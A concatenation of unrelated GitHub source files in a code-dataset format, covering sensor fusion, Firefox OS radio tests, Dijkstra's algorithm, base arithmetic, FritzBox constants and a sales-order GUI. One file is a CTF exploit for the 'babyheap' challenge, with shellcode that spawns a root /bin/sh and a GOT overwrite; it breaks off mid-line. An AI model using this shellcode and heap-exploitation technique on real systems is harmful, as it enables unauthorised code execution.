initialize_fusion_objects(not_assigned_sensor_obj_list):\n \"\"\"\n :param not_assigned_sensor_obj_list: list of not assigned objects from the sensors\n :return: fusion_list_initialized_objects:\n \"\"\"\n sensor_specs = not_assigned_sensor_obj_list.sensor_specs\n time = not_assigned_sensor_obj_list.timeStamp\n new_fusion_elements = []\n \n for sensor_obj in not_assigned_sensor_obj_list:\n s_vector = sensor_obj.s_vector\n P = sensor_obj.P\n \n if not all(s_vector[:3] == s_vector[:3]): # some missing position measurements (NaN != NaN)\n pos_initializers = sensor_specs['pos_initializers']\n pos_nans = np.where(np.isnan(s_vector[:3]))[0]\n for i in pos_nans:\n s_vector[:3][i] = np.random.normal(loc=pos_initializers[i],\n scale=pos_initializers[i] / 10.)\n P[i, :] = 0.\n P[:, i] = 0.\n P[i, i] = 1e18\n \n if not all(s_vector[3:6] == s_vector[3:6]): # some missing velocity measurements\n vel_initializers = sensor_specs['vel_initializers']\n vel_nans = np.where(np.isnan(s_vector[3:6]))[0]\n for i in vel_nans:\n s_vector[3:6][i] = np.random.normal(loc=vel_initializers[i],\n scale=vel_initializers[i] / 10.)\n P[3+i, :] = 0.\n P[:, 3+i] = 0.\n P[3+i, 3+i] = 1e18\n\n if not all(s_vector[6:9] == s_vector[6:9]): # some missing acc measurements\n acc_nans = np.where(np.isnan(s_vector[6:9]))[0]\n s_vector[6:9][acc_nans] = np.random.normal(size=(len(acc_nans)))\n for i in acc_nans:\n P[6+i, :] = 0.\n P[:, 6+i] = 0.\n P[6+i, 6+i] = 1e18\n new_fusion_elements.append(Obstacle(pos_x=s_vector[0], pos_y=s_vector[1],\n pos_z=s_vector[2], v_x=s_vector[3],\n v_y=s_vector[4], v_z=s_vector[5],\n a_x=s_vector[6], a_y=s_vector[7],\n a_z=s_vector[8],\n yaw=s_vector[9], r_yaw=s_vector[10], P=P,\n last_update_time=time, p_existence=1))\n return new_fusion_elements\n\n\ndef drop_objects(fusion_list, cluttered_matches, last_seen, distance_to_ego):\n \"\"\"\n :param fusion_list:\n :param distance_to_ego:\n :param last_seen:\n :return:\n \"\"\"\n num_dropped = 0\n fusion_time = fusion_list.timeStamp\n # indices of false positive detections\n fp_detections = [i[1] for i in cluttered_matches]\n # indices of lost actors (because of long distance to ego / \n # last update time is long)\n lost_detections = []\n for idx, fusion_obj in enumerate(fusion_list):\n last_update = fusion_obj.last_update_time\n D = np.linalg.norm(fusion_obj.s_vector[:3])\n if fusion_time - last_update > last_seen or D > distance_to_ego: \n lost_detections.append(idx)\n num_dropped += 1\n \n print(\"Number of dropped actors (because of long distance to ego /\" \n \" last update time is long): %i\" %(num_dropped))\n idx_to_del = list(set(fp_detections + lost_detections))\n
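 # np.delete needs an ndarray: convert, drop the stale/false tracks, return a list\n fusion_list = 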
np.array(fusion_list)\n return list(np.delete(fusion_list, idx_to_del))","repo_name":"andro-demir/Sensor-Fusion-And-Target-Tracking-For-Autonomous-Vehicles","sub_path":"trackManagement.py","file_name":"trackManagement.py","file_ext":"py","file_size_in_byte":3528,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"26300061381","text":"# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this file,\n# You can obtain one at http://mozilla.org/MPL/2.0/.\n\nimport time\n\nfrom marionette_driver.wait import Wait\n\n\nclass FMRadioTestCommon(object):\n def __init__(self):\n # ensure radio is off on test startup\n if self.is_radio_enabled():\n self.turn_radio_off()\n\n def is_antenna_available(self):\n return self.marionette.execute_script(\"return window.navigator.mozFMRadio.antennaAvailable\")\n\n def user_connect_antenna(self):\n self.setup_antenna_change_listener()\n self.instruct(\"Insert the headset into the Firefox OS device, then click 'OK'\")\n self.wait_for_antenna_change()\n self.assertTrue(self.is_antenna_available(), \"Expected antenna/headset to be connected\")\n self.remove_antenna_change_listener()\n\n def user_detach_antenna(self):\n self.setup_antenna_change_listener()\n self.instruct(\"Remove the headset from the device, then click 'OK'\")\n self.wait_for_antenna_change()\n self.assertFalse(self.is_antenna_available(), \"Expected antenna/headset to be disconnected\")\n self.remove_antenna_change_listener()\n\n def is_radio_enabled(self):\n return self.marionette.execute_script(\"return window.navigator.mozFMRadio.enabled\")\n\n def setup_antenna_change_listener(self):\n # setup event handler for antenna insert/remove\n self.marionette.execute_async_script(\"\"\"\n var fm = window.navigator.mozFMRadio;\n window.wrappedJSObject.antenna_change = false;\n fm.onantennaavailablechange = function() {\n window.wrappedJSObject.antenna_change = true;\n };\n marionetteScriptFinished(1);\n \"\"\")\n\n def remove_antenna_change_listener(self):\n self.marionette.execute_script(\"window.navigator.mozFMRadio.onantennaavailablechange = null\")\n\n def wait_for_antenna_change(self):\n # wait for the antenna availability state to change\n wait = Wait(self.marionette, timeout=10, interval=0.5)\n try:\n wait.until(lambda x: x.execute_script(\"return window.wrappedJSObject.antenna_change\"))\n except Exception:\n self.fail(\"Failed to receive mozFMRadio.onantennaavailablechange event\")\n\n def setup_radio_change_listeners(self):\n # setup event handlers for radio turning on/off\n self.marionette.execute_async_script(\"\"\"\n var fm = window.navigator.mozFMRadio;\n window.wrappedJSObject.rcvd_radio_on = false;\n fm.onenabled = function() {\n window.wrappedJSObject.rcvd_radio_on = true;\n };\n window.wrappedJSObject.rcvd_radio_off = false;\n fm.ondisabled = function() {\n window.wrappedJSObject.rcvd_radio_off = true;\n };\n marionetteScriptFinished(1);\n \"\"\")\n\n def remove_radio_change_listeners(self):\n self.marionette.execute_script(\"\"\"\n window.navigator.mozFMRadio.onenabled = null;\n window.navigator.mozFMRadio.ondisabled = null;\n \"\"\")\n\n def turn_radio_on(self):\n self.change_radio_state(turning_on=True)\n\n def turn_radio_off(self):\n self.change_radio_state(turning_on=False)\n\n def change_radio_state(self, turning_on):\n # turn on or off radio and verify request\n self.marionette.execute_async_script(\"\"\"\n var turning_on = arguments[0];\n
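 // grab the FM radio API; turning_on selects enable vs disable below\n var fm = 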
window.navigator.mozFMRadio;\n window.wrappedJSObject.rcvd_success = false;\n window.wrappedJSObject.rcvd_error = false;\n // turn on or off accordingly\n if (turning_on) {\n var request = fm.enable(99.9);\n } else {\n var request = fm.disable();\n };\n // verify request\n request.onsuccess = function() {\n window.wrappedJSObject.rcvd_success = true;\n };\n request.onerror = function() {\n window.wrappedJSObject.rcvd_error = true;\n };\n marionetteScriptFinished(1);\n \"\"\", script_args=[turning_on])\n\n # wait for radio to change state\n wait = Wait(self.marionette, timeout=10, interval=0.5)\n try:\n wait.until(lambda x: x.execute_script(\"return window.wrappedJSObject.rcvd_success\"))\n except Exception:\n if self.marionette.execute_script(\"return window.wrappedJSObject.rcvd_error\"):\n if turning_on:\n self.fail(\"MozFMRadio.enable returned error\")\n else:\n self.fail(\"MozFMRadio.disable returned error\")\n else:\n if turning_on:\n self.fail(\"Failed to turn on the fm radio\")\n else:\n self.fail(\"Failed to turn off the fm radio\")\n\n def rcvd_radio_on(self):\n return self.marionette.execute_script(\"return window.wrappedJSObject.rcvd_radio_on\")\n\n def rcvd_radio_off(self):\n return self.marionette.execute_script(\"return window.wrappedJSObject.rcvd_radio_off\")\n","repo_name":"mozilla-b2g/fxos-certsuite","sub_path":"mcts/webapi_tests/fm_radio/fm_radio_test.py","file_name":"fm_radio_test.py","file_ext":"py","file_size_in_byte":5031,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"31099701950","text":"# -*- coding: utf-8 -*-\n\n# Notice it's almost identical to prim.\n# In Prim (MST) we add the next vertex of\n# min weight. In SP we add the closest\n# to s, the new edge weight plus the distance\n# from s to the tree vertex it connects to\n\n# There is a Dijkstra version with runtime\n# O(E+V*log(V)) but requires heap.decrease_priority()\n\nfrom collections import defaultdict\nimport heapq\n\n\nclass Graph:\n def __init__(self, vertices):\n self.vertices = vertices\n self.edges = defaultdict(set)\n\n def insert(self, v, edges, directed=False):\n for y, weight in edges:\n self.edges[v].add((y, weight))\n if not directed:\n self.insert(y, [(v, weight)], directed=True)\n\n\n# from book\ndef dijkstra(graph, start):\n # is in SPT\n in_tree = defaultdict(lambda: False)\n # cost of adding to tree\n distance = defaultdict(lambda: float('inf'))\n # to construct the SPT\n parent = defaultdict(lambda: None)\n\n distance[start] = 0\n v = start\n while not in_tree[v]:\n print('Inserted vertex=%r' % v)\n in_tree[v] = True\n for y, weight in graph.edges[v]:\n if distance[y] > distance[v]+weight and not in_tree[y]:\n distance[y] = distance[v]+weight\n parent[y] = v\n # select edge of min weight\n v = start\n dist = float('inf')\n for y in graph.vertices:\n if not in_tree[y] and dist > distance[y]:\n dist = distance[y]\n v = y\n\n return dict(distance), dict(parent)\n\n\n# runtime (V²)\ndef dijkstra2(graph, start):\n parent = {}\n dist = defaultdict(lambda: float('inf'))\n dist[start] = 0\n queue = set(graph.vertices)\n while queue:\n _, v = min((dist[v], v) for v in queue)\n queue.remove(v)\n for y, weight in graph.edges[v]:\n if y not in queue:\n continue\n alt = dist[v] + weight\n if alt < dist[y]:\n dist[y] = alt\n parent[y] = (weight, v)\n return parent\n\n\n
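# A working O(E log V) sketch using plain heapq: instead of decrease_priority,\n# push a fresh entry whenever a distance improves and skip entries that are\n# already stale when popped (\"lazy deletion\").\ndef dijkstra_lazy(graph, start):\n parent = {}\n dist = defaultdict(lambda: float('inf'))\n dist[start] = 0\n queue = [(0, start)]\n while queue:\n d, v = heapq.heappop(queue)\n if d > dist[v]:\n continue # stale entry; a shorter path to v was already settled\n for y, weight in graph.edges[v]:\n alt = d + weight\n if alt < dist[y]:\n dist[y] = alt\n parent[y] = (weight, v)\n heapq.heappush(queue, (alt, y))\n return parent\n\n\n# faster dijkstra. 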
Broken since decrease_priority\n# does not exist in heapq\ndef dijkstra3(graph, start):\n def decrease_priority_or_insert(q, weight, v):\n pass\n parent = {}\n dist = defaultdict(lambda: float('inf'))\n dist[start] = 0\n queue = [(0, start)]\n while queue:\n _, v = heapq.heappop(queue)\n for y, weight in graph.edges[v]:\n alt = dist[v] + weight\n if alt < dist[y]:\n dist[y] = alt\n parent[y] = (weight, v)\n decrease_priority_or_insert(queue, alt, y)\n return dict(parent)\n\n\n# Figure 6.3\ng1 = Graph('abcdefg')\ng1.insert('a', [('b', 5), ('c', 7), ('d', 12)])\ng1.insert('b', [('e', 7), ('c', 9)])\ng1.insert('c', [('d', 4), ('e', 4), ('f', 3)])\ng1.insert('d', [('f', 7)])\ng1.insert('e', [('f', 2), ('g', 5)])\ng1.insert('f', [('g', 2)])\nprint(dijkstra(g1, start='a'))\n# Inserted vertex='a'\n# Inserted vertex='b'\n# Inserted vertex='c'\n# Inserted vertex='f'\n# Inserted vertex='d'\n# Inserted vertex='e'\n# Inserted vertex='g'\n# {'b': 'a', 'c': 'a', 'd': 'c', 'e': 'c', 'f': 'c', 'g': 'f'}\n\nprint(dijkstra2(g1, start='a'))\n# {'d': 'c', 'b': 'a', 'c': 'a', 'e': 'c', 'f': 'c', 'g': 'f'}\n","repo_name":"nitely/algo-design-manual-notes","sub_path":"solutions/06_00_dijkstra.py","file_name":"06_00_dijkstra.py","file_ext":"py","file_size_in_byte":3238,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"35446389624","text":"from math import floor\r\n\ncup_nums = int(input())\nstart_points = int(input())\n\ncup_points = 0\n\nwins_count = 0\n\nfor cup in range(cup_nums):\n stage = input()\n if stage == \"W\":\n cup_points += 2000\n wins_count += 1\n elif stage == \"F\":\n cup_points += 1200\n elif stage == \"SF\":\n cup_points += 720\n\n# The average of a set of numbers is simply the sum of the numbers divided by the total number of values in the set.\navg_points = floor(cup_points / cup_nums) # average points earned per tournament played\nperc_wins = (wins_count / cup_nums) * 100 # percentage of tournaments won\ntotal_points = cup_points + start_points\n\nprint(f\"Final points: {total_points}\")\nprint(f\"Average points: {avg_points}\")\nprint(f\"{perc_wins:.2f}%\")\n","repo_name":"maon0002/Programming-Basics-with-Python-July-September-2022","sub_path":"for_loop__exercise/08_tennis_ranklist.py","file_name":"08_tennis_ranklist.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"39386879103","text":"\"\"\"\n@author: Ioana Gabor\n\"\"\"\n\nfrom number import Number\n\n\nclass Operations:\n @staticmethod\n def add(first_number, second_number):\n \"\"\"Adds two Numbers or raises ValueError if the Numbers have different bases\n\n :param first_number: Number\n :param second_number: Number\n :return: Number\n \"\"\"\n if first_number.get_base() != second_number.get_base():\n raise ValueError(\"The numbers have different bases!\\n\")\n digits1 = first_number.get_digits()\n digits2 = second_number.get_digits()\n base = first_number.get_base()\n result = []\n carry = 0\n digits1.reverse()\n digits2.reverse()\n if len(digits1) < len(digits2):\n digits1 += [0 for _ in range(len(digits2) - len(digits1))]\n elif len(digits1) > len(digits2):\n digits2 += [0 for _ in range(len(digits1) - len(digits2))]\n\n for d in range(len(digits2)):\n sum = (digits2[d] + digits1[d] + carry)\n carry = sum // base\n result.append(sum % base)\n if carry:\n result.append(carry)\n result.reverse()\n return Number(result, base)
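\n\n # usage example: add(Number([1, 0, 1], 2), Number([1, 1], 2)) returns Number([1, 0, 0, 0], 2),\n # i.e. 5 + 3 == 8 in base 2; both operands must share the same base.\n\n @staticmethod\n def 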
compare(first_number, second_number):\n \"\"\"Compares two numbers\n\n :param first_number: Number\n :param second_number:Number\n :return: -1 if first < second, 0 if first == second, 1 if first > second\n \"\"\"\n digits1 = first_number.get_digits()\n digits2 = second_number.get_digits()\n if len(digits1) < len(digits2):\n return -1\n if len(digits1) > len(digits2):\n return 1\n for d in range(len(digits1)):\n if digits1[d] < digits2[d]:\n return -1\n elif digits1[d] > digits2[d]:\n return 1\n return 0\n\n @staticmethod\n def subtract(first_number, second_number):\n \"\"\"Subtracts two Numbers or raises ValueError if the Numbers have different bases or if the first one is smaller\n\n :param first_number: Number\n :param second_number: Number\n :return: Number\n \"\"\"\n if first_number.get_base() != second_number.get_base():\n raise ValueError(\"The numbers have different bases!\\n\")\n if Operations.compare(first_number, second_number) < 0:\n raise ValueError(\"The first number can't be larger than the second number!\\n\")\n digits1 = first_number.get_digits()\n digits2 = second_number.get_digits()\n base = first_number.get_base()\n result = []\n borrow = 0\n digits1.reverse()\n digits2.reverse()\n if len(digits1) > len(digits2):\n digits2 += [0 for _ in range(len(digits1) - len(digits2))]\n\n for d in range(len(digits1)):\n if digits1[d] + borrow >= digits2[d]:\n current_digit = (digits1[d] + borrow - digits2[d]) % base\n borrow = 0\n else:\n current_digit = (digits1[d] + borrow + base - digits2[d]) % base\n borrow = -1\n result.append(current_digit)\n while len(result) > 1 and result[-1] == 0:\n result.pop(len(result) - 1)\n result.reverse()\n return Number(result, base)\n\n @staticmethod\n def multiply(first_number, second_number):\n \"\"\"Multiplies two Numbers or raises ValueError if the Numbers have different bases or if the second one has more than one digit\n\n :param first_number: Number\n :param second_number: Number\n :return: Number\n \"\"\"\n\n if first_number.get_base() != second_number.get_base():\n raise ValueError(\"The numbers have different bases!\\n\")\n digits1 = first_number.get_digits()\n digits2 = second_number.get_digits()\n base = first_number.get_base()\n if len(digits2) > 1:\n raise ValueError(\"The second number should have only one digit!\\n\")\n digit2 = digits2[0]\n digits1.reverse()\n result = []\n carry = 0\n for d in range(len(digits1)):\n prod = digits1[d] * digit2 + carry\n carry = prod // base\n result.append(prod % base)\n if carry:\n result.append(carry)\n while len(result) > 1 and result[-1] == 0:\n result = result[:-1]\n result.reverse()\n return Number(result, base)\n\n @staticmethod\n def divide(first_number, second_number):\n \"\"\"Divides two Numbers or raises ValueError if the Numbers have different bases or if the second one has more than one digit\n or if the second one is 0.\n\n :param first_number: Number\n :param second_number: Number\n :return: Number\n \"\"\"\n if first_number.get_base() != second_number.get_base():\n raise ValueError(\"The numbers have different bases!\\n\")\n if second_number.is_zero():\n raise ZeroDivisionError(\"Cannot divide by 0!\")\n digits1 = first_number.get_digits()\n digits2 = second_number.get_digits()\n base = first_number.get_base()\n if len(digits2) > 1:\n raise ValueError(\"The second number should have only one digit!\\n\")\n digit2 = digits2[0]\n result = []\n remainder = 0\n for d in range(len(digits1)):\n current_digit = (remainder * base + digits1[d]) // digit2\n remainder = (remainder * base + 
digits1[d]) % digit2\n result.append(current_digit)\n while result[0] == 0 and len(result) > 1:\n result.pop(0)\n return Number(result, base), Number([remainder], base)\n\n#\n# if __name__ == \"__main__\":\n# print(Operations.divide(Number.get_number_from_string_representation(\"123\", 4),\n# Number.get_number_from_string_representation(\"3\", 4))[0])\n","repo_name":"IoanaGabor/University","sub_path":"Semester-1/Computational Logic/bases_operations_conversions/operations.py","file_name":"operations.py","file_ext":"py","file_size_in_byte":5830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38532120907","text":"__version__ = 0.9\n__author___ = 'Wagner Matthias'\n\nLOGGING_CONFIG_FORMAT = \"%(asctime)s - %(message)s\"\n\nFRITZBOX_TIMESTAMP_DELTA_MAX = 60 # Max age of old value, after x minutes the value will be written again, also if DELTA_MIN is not exceeded\n\nFRITZBOX_TEMPERATURE_PARAMETER_NAME = 'NewTemperatureCelsius'\nFRITZBOX_TEMPERATURE_PARAMETER_VALID = 'NewTemperatureIsValid'\nFRITZBOX_TEMPERATURE_PARAMETER_ENABLED = 'NewTemperatureIsEnabled'\nFRITZBOX_TEMPERATURE_PARAMETER_OFFSET = 'NewTemperatureOffset'\nFRITZBOX_TEMPERATURE_DELTA_MIN = 0.49 # Only write values if delta is reached\nFRITZBOX_TEMPERATURE_FACTOR = 0.1 # Factor for multiplication \n\nFRITZBOX_HKR_VALVE_STAT_PARAMETER_NAME = 'NewHkrSetVentilStatus'\nFRITZBOX_HKR_VALVE_REDUCED_PARAMETER_NAME = 'NewHkrReduceVentilStatus'\nFRITZBOX_HKR_VALVE_COMFORT_PARAMETER_NAME = 'NewHkrComfortVentilStatus'\nFRITZBOX_HKR_TEMP_REDUCED_PARAMETER_NAME = 'NewHkrReduceTemperature'\nFRITZBOX_HKR_TEMP_COMFORT_PARAMETER_NAME = 'NewHkrComfortTemperature'\nFRITZBOX_HKR_VALID_PARAMETER_NAME = 'NewHkrIsValid'\nFRITZBOX_HKR_ENABLED_PARAMETER_NAME = 'NewHkrIsEnabled'\nFRITZBOX_HKR_TEMP_REDUCED_FACTOR = 0.1\nFRITZBOX_HKR_TEMP_COMFORT_FACTOR = 0.1\n\nFRITZBOX_POWER_PARAMETER_NAME = 'NewMultimeterPower'\nFRITZBOX_POWER_PARAMETER_VALID = 'NewMultimeterIsValid'\nFRITZBOX_POWER_PARAMETER_ENABLED = 'NewMultimeterIsEnabled'\nFRITZBOX_POWER_DELTA_MIN = 1 # Only write values if delta is reached\nFRITZBOX_POWER_FACTOR = 0.01 # Factor for multiplication \n\n","repo_name":"W61g6E65R/MeiFritzBoxConnectorrr","sub_path":"modules/globalConstants.py","file_name":"globalConstants.py","file_ext":"py","file_size_in_byte":1577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17118981092","text":"class Colors(object):\n RED = '\\033[1;41m'\n GREEN = '\\033[1;42m'\n YELLOW = '\\033[1;43m'\n BLUE = '\\033[1;44m'\n MAGENTA = '\\033[1;45m'\n CYAN = '\\033[1;46m'\n ENDC = '\\033[0m'\n\n\ndef timeit(logger, fmt, threshold):\n from json import dumps\n import time\n\n def is_json(json_data):\n try:\n json_object = dumps(json_data, indent=4)\n except ValueError:\n return False\n else:\n return json_object\n\n def timereald(method):\n def timed(*args, **kw):\n start = time.clock()\n result = method(*args, **kw)\n end = time.clock()\n\n try:\n obj, value = args\n data = is_json(value) if False else value\n except Exception:\n data = is_json(args) if False else args\n\n sec = (end - start)\n sec_color = Colors.RED\n if sec <= threshold[0]:\n sec_color = Colors.BLUE\n elif sec <= threshold[1]:\n sec_color = Colors.GREEN\n\n if fmt == 'simple':\n logger.debug(\"\\nName: %r\\nClock: %s%2.8f%s sec\\n\" %\n (method.__name__,\n sec_color,\n sec,\n Colors.ENDC,\n ))\n elif fmt == 'verbose':\n logger.debug(\n \"\\nName: %r\\nClock: %s%2.8f%s sec\\nObj: %s\\nkw: 
%s\\n%s\\n\" %\n (method.__name__,\n sec_color,\n sec,\n Colors.ENDC,\n obj,\n kw,\n data,\n ))\n return result\n return timed\n return timereald\n","repo_name":"deoplete-plugins/deoplete-clang","sub_path":"rplugin/python3/deoplete/sources/deoplete_clang/profiler.py","file_name":"profiler.py","file_ext":"py","file_size_in_byte":1794,"program_lang":"python","lang":"en","doc_type":"code","stars":189,"dataset":"github-code","pt":"53"} +{"seq_id":"12252453734","text":"from pwn import *\nimport re\ndef main():\n\t\"\"\"\n\t\tdefcon-2014-babyheap\n\t\"\"\"\n\tHOST = \"192.168.56.101\"\n\tPORT = 49158\n\tconn = remote(HOST,PORT)\n\tdata = conn.recvuntil(\"Write to object [size=260]:\")\n\traw_input(\"$\")\n\n\t#Get Heap pointer to shellcode\n\tmy_loc = re.findall(\"\\[ALLOC\\]\\[loc=(.*)\\]\\[size=260\\]\",data)\n\tmy_ptr = int(my_loc[0],16)\n\tprint (\"HEAP ADR:%s\"%hex(my_ptr))\n\n\t#setreuid /bin/sh\n\tshellcode_length = 252\n\tshellcode = \"\\xeb\\x0c\"\n\tshellcode = shellcode + \"\\x90\"*40 + \"\\x6a\\x31\\x58\\x99\\xcd\\x80\\x89\\xc3\\x89\\xc1\\x6a\\x46\\x58\\xcd\\x80\\xb0\\x0b\\x52\\x68\\x6e\\x2f\\x73\\x68\\x68\\x2f\\x2f\\x62\\x69\\x89\\xe3\\x89\\xd1\\xcd\\x80\"\n\tshellcode = shellcode + \"\\x90\"*(shellcode_length-len(shellcode))\n\t\n\t#printf .got pointer\t\n\tpf_ptr = struct.pack(\" 0:\n nome_cliente = combo_cliente.get()\n data = entry_data.get()\n prazo = combo_prazo.get()\n if prazo == \"A vista\":\n data_vencimento = datetime.date.today()\n data_vencimento = data_vencimento.strftime(\"%d/%m/%Y\")\n else:\n prazo = int(prazo.split(\" \")[0].strip())\n data_vencimento = somar_dias_uteis(prazo)\n with open(\"config/arquivos/lista_clientes.txt\", \"r\") as arquivo:\n lista_clientes_buscar = arquivo.readlines()\n for cliente in lista_clientes_buscar:\n razao_social = cliente.split(\" | \")[1].strip()\n if razao_social == nome_cliente:\n codigo_cliente_omie = cliente.split(\" | \")[0].strip()\n break\n lista_nome_produtos_selecionados = []\n lista_valor_selecionados = []\n lista_quantidade_selecionados = []\n lista_codigo_produtos_selecionados = []\n lista_unidade_selecionados = []\n lista_projeto_selecionados = []\n lista_ncm_selecionados = []\n lista_cfop_selecionados = []\n lista_pedidos_venda = []\n dict_pedido_venda = {}\n \n for linha in prods_selecionados: \n linha = linha.split(\" | \")\n nome_produto = linha[0]\n quantidade_prod = float(linha[1].strip())\n valor = linha[2].strip()\n valor = float(valor.replace(\"\\n\", \"\"))\n cfop, codigo_produto, descricao, ncm, unidade, valor_unitario = pesquisar_produto_nome_func(nome_produto)\n codigo_projeto = get_cod_projeto(nome_produto)\n dict_det = {\n \"ide\": {\n \"codigo_item_integracao\": \"4422421\"\n },\n \"produto\": {\n \"cfop\": cfop,\n \"codigo_produto\": codigo_produto,\n \"descricao\": descricao,\n \"ncm\": ncm,\n \"quantidade\": quantidade_prod,\n \"unidade\": unidade,\n \"valor_unitario\": valor\n }\n }\n \n lista_det.append(dict_det) \n lista_nome_produtos_selecionados.append(nome_produto)\n lista_codigo_produtos_selecionados.append(codigo_produto)\n lista_quantidade_selecionados.append(quantidade_prod)\n lista_valor_selecionados.append(valor)\n lista_cfop_selecionados.append(cfop)\n lista_ncm_selecionados.append(ncm)\n lista_projeto_selecionados.append(codigo_projeto)\n lista_unidade_selecionados.append(unidade)\n with open(f\"config/arquivos/temp_lista_det_{codigo_cliente_omie}.txt\", \"w\") as arquivo:\n arquivo.write(str(lista_det))\n dict_pedido_venda = {\n \"valor\": lista_valor_selecionados,\n \"razao_social\": 
razao_social,\n \"codigo_produto\": lista_codigo_produtos_selecionados,\n \"codigo_cliente_omie\": codigo_cliente_omie,\n \"data_vencimento\": data_vencimento,\n \"cfop\": lista_cfop_selecionados,\n \"descricao\": lista_nome_produtos_selecionados,\n \"ncm\": lista_ncm_selecionados,\n \"unidade\": lista_unidade_selecionados, \n \"quantidade_prod\": lista_quantidade_selecionados, \n \"codigo_projeto\": lista_projeto_selecionados\n }\n with open(\"config/arquivos/lista_det.txt\", \"w\") as arquivo:\n arquivo.write(str(lista_det))\n lista_titulos = [\"valor\", \"razao_social\"]\n lista_pedidos_venda.append(dict_pedido_venda)\n with open(\"config/arquivos/dados_venda.txt\", \"w\") as arquivo:\n arquivo.write(f\"{codigo_cliente_omie} | {data_vencimento}\")\n text_venda.configure(state=\"normal\") \n for dict_pedido_venda in lista_pedidos_venda:\n for chave, valor in dict_pedido_venda.items(): \n for titulo in lista_titulos:\n if chave == titulo:\n if chave == \"razao_social\": \n text_venda.insert(f\"0.0\", f\"Cliente: {valor}\\n\")\n if chave == \"valor\":\n lista_quantidade = dict_pedido_venda[\"quantidade_prod\"]\n lista_preco = dict_pedido_venda[\"valor\"]\n total = 0\n for quantidade, preco in zip(lista_quantidade, lista_preco):\n total += quantidade * preco\n text_venda.insert(f\"1.0\", f\"Valor: R$ {total}\\n\\n\")\n text_venda.insert(f\"1.0\", f\"Data: {data}\\n\")\n break\n text_venda.configure(state=\"disabled\")\n limpar_prods_selecionados()\n def voltar_prod_func():\n #NOTE - voltar_prod_func\n janela_pedido_venda.destroy()\n sub_janela_relatorio.deiconify()\n sub_janela_relatorio.state(\"zoomed\")\n def inicio_prod_func():\n #NOTE - inicio_prod_func\n janela_pedido_venda.destroy()\n sub_janela_relatorio.destroy()\n def get_codigo(nome_produto):\n #NOTE - get_codigo\n \"\"\"Pega o codigo do produto na lista de produtos\n \n param:\n - string: nome_produto\n \n return:\n - string: codigo\"\"\"\n with open(\"config/arquivos/lista_produtos.txt\", \"r\") as arquivo:\n lista_produtos = arquivo.readlines()\n nome_produto_aux= nome_produto.replace(\" \", \"\")\n for produto in lista_produtos: \n produto = produto.split(\"|\")\n nome = produto[1]\n nome_aux = nome.replace(\" \", \"\")\n if str(nome_produto_aux) in str(nome_aux):\n codigo = produto[0]\n codigo = codigo.replace(\" \", \"\")\n break\n return codigo\n def btn_pedido_venda_func(): \n #NOTE - btn_pedido_venda_func\n pyautogui.alert(text=\"Aguarde...\") \n with open(\"config/arquivos/codigo_local_estoque_aux.txt\", \"r\") as arquivo:\n codigo_local_estoque = arquivo.read()\n codigo_local_estoque = codigo_local_estoque.strip() \n with open(\"config/arquivos/lista_det.txt\", \"r\") as arquivo:\n lista_det = arquivo.read()\n lista_det = ast.literal_eval(lista_det)\n with open(\"config/arquivos/dados_venda.txt\", \"r\") as arquivo:\n dados_venda = arquivo.read()\n data_vencimento = dados_venda.split(\" | \")[1].strip()\n arquivos = os.listdir(\"config/arquivos\")\n venda = False\n for arquivo_dir in arquivos:\n if \"temp_lista_det_\" in arquivo_dir:\n codigo_cliente_omie = arquivo_dir.split(\"_\")[3]\n codigo_cliente_omie = codigo_cliente_omie.split(\".\")[0]\n with open(f\"config/arquivos/{arquivo_dir}\") as arquivo:\n temp_det = arquivo.read()\n temp_det = ast.literal_eval(temp_det)\n with open(\"config/arquivos/lista_departamentos.txt\", \"r\") as arquivo:\n lista_departamentos = arquivo.readlines()\n departamentos = []\n tamanho_lista = float(len(temp_det))\n nPerc = float(100 / tamanho_lista)\n if nPerc == 100.0000000:\n nPerc = 
f\"{nPerc:.6f}\"\n else:\n nPerc = f\"{nPerc:.7f}\"\n for dict_det in temp_det:\n produtos = dict_det[\"produto\"]\n descricao = produtos[\"descricao\"]\n nValor = produtos[\"valor_unitario\"] * produtos[\"quantidade\"]\n for departamento in lista_departamentos:\n nome_departamento = departamento.split(\" | \")[1].strip()\n if nome_departamento == descricao:\n codigo_departamento = departamento.split(\" | \")[0].strip()\n dict_departamentos = {\n \"cCodDepto\": codigo_departamento,\n \"nPerc\": nPerc,\n \"nValor\": nValor,\n \"nValorFixo\": \"S\"\n }\n departamentos.append(dict_departamentos)\n \n incluir_pedido_venda_lot(temp_det, codigo_cliente_omie, data_vencimento, departamentos)\n venda = True\n os.remove(f\"config/arquivos/{arquivo_dir}\") \n for dict_det in temp_det:\n produtos = dict_det[\"produto\"]\n descricao = produtos[\"descricao\"]\n quantidade = produtos[\"quantidade\"]\n obs_ent = \"Produto vendido de caminhão. Aguardando baixa pelo relatório\"\n obs_sai = \"Produto vendido\"\n codigo_produto = get_codigo(descricao)\n cfop, codigo_produto, descricao, ncm, unidade, valor_unitario = pesquisar_produto_cod_func(codigo_produto)\n incluir_ajuste_estoque(codigo_produto, quantidade, 'SAI', valor_unitario, obs_sai, codigo_local_estoque)\n incluir_ajuste_estoque(codigo_produto, quantidade, 'ENT', valor_unitario, obs_ent, codigo_local_estoque_galpao)\n if venda == True:\n sub_janela_alerta_sucesso()\n janela_pedido_venda.destroy()\n sub_janela_relatorio.deiconify()\n sub_janela_relatorio.state(\"zoomed\")\n produtos_nao_retornados = diferenca_quantidade_estoque_produto(codigo_local_estoque)\n atualizar_func()\n #!SECTION\n \n\n #SECTION - Centro\n #NOTE - frame_meio\n frame_meio = ctk.CTkFrame(\n master=janela_pedido_venda,\n width=1300,\n height=550,\n fg_color=\"transparent\"\n )\n frame_meio.place(relx=0.5, rely=0.5, anchor=tkinter.CENTER)\n\n #NOTE - frame_central\n frame_central = ctk.CTkFrame(\n master=frame_meio,\n width=300,\n height=360,\n fg_color= (\"#3b3b3b\")\n )\n 